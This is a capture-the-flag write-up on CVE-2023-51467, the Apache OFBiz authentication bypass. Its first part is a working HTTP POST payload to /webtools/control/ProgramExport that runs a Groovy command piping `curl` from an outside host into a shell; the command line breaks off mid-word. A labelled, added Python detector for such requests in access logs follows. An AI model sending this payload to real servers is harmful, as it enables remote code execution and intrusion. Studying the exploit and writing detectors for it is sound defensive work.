Challenge 01: Be a Framework Hacker
Clone and Pwn, difficulty: Baby

Since an attachment is provided, the service can be started locally with the following commands:

```
docker build . -t rwctf:be-a-framework-hacker
docker run --rm -p 8443:8443 rwctf:be-a-framework-hacker
```

The vulnerability this challenge targets is CVE-2023-51467: authentication is bypassed with `?USERNAME=&PASSWORD=&requirePasswordChange=Y`. Once past authentication, Groovy expressions can be executed; here Groovy's `"".execute()` syntax is used to run a command and escape the sandbox. The payload is as follows:

```http
POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 127.0.0.1:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

groovyProgram=["sh","-c","curl http://igr3yxom.requestrepo.com | ba
```
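The bypass above leaves a recognisable trace in web server logs: a request under the `/webtools/control/` admin webapp whose query string carries `requirePasswordChange=Y` together with empty `USERNAME` and `PASSWORD` values. The following detector is an added example written for this page, not code from the writeup or from Apache OFBiz; the access-log format and the sample log lines are constructed, and only the `/webtools/control/` path and the `ProgramExport` endpoint come from the writeup. It flags any matching request and rates hits against `ProgramExport` (the Groovy execution endpoint) as critical, since a 200 there means the bypass reached code execution.

```python
"""Flag CVE-2023-51467-style authentication-bypass attempts against the
OFBiz webtools webapp in HTTP access logs. Added example, not from the writeup."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in a combined-log style; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jan/2024:10:00:01 +0000] "GET /webtools/control/main HTTP/1.1" 302 0
10.0.0.9 - - [27/Jan/2024:10:00:02 +0000] "POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 512
10.0.0.9 - - [27/Jan/2024:10:00:03 +0000] "GET /webtools/control/main?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 100
10.0.0.7 - - [27/Jan/2024:10:00:04 +0000] "POST /webtools/control/login?USERNAME=admin&PASSWORD=secret HTTP/1.1" 200 300
10.0.0.8 - - [27/Jan/2024:10:00:05 +0000] "GET /ecommerce/control/main HTTP/1.1" 200 4000
"""

# ip ident user [timestamp] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

ADMIN_PREFIX = "/webtools/control/"   # OFBiz admin webapp, from the writeup
RCE_ENDPOINT = "ProgramExport"        # Groovy execution endpoint, from the writeup


def classify_request(target: str):
    """Return a finding for a bypass-shaped request target, else None."""
    parts = urlsplit(target)
    # Drop path parameters such as the ';/' the writeup uses before the query.
    path = parts.path.split(";", 1)[0]
    if not path.startswith(ADMIN_PREFIX):
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    # Missing credentials are treated the same as empty ones, on purpose:
    # a conservative rule that errs toward flagging.
    empty_creds = (q.get("USERNAME", [""])[0] == ""
                   and q.get("PASSWORD", [""])[0] == "")
    if q.get("requirePasswordChange", [""])[0] != "Y" or not empty_creds:
        return None
    endpoint = path.rsplit("/", 1)[-1]
    severity = "critical" if endpoint == RCE_ENDPOINT else "high"
    return {"path": path, "endpoint": endpoint, "severity": severity}


def scan_log(text: str):
    """Parse each log line and collect findings for bypass-shaped requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m["target"])
        if finding is None:
            continue
        finding.update(ip=m["ip"], ts=m["ts"], method=m["method"],
                       status=int(m["status"]))
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity'].upper():8} {f['ip']} {f['method']} {f['path']} -> {f['status']}")
```

The path-parameter stripping matters: the writeup's request puts `;/` between `ProgramExport` and the query string, so a naive equality check on the raw target would miss it. A successful (status 200) hit on `ProgramExport` with empty credentials is the strongest signal this detector produces and warrants treating the host as compromised until the `groovyProgram` body can be reviewed.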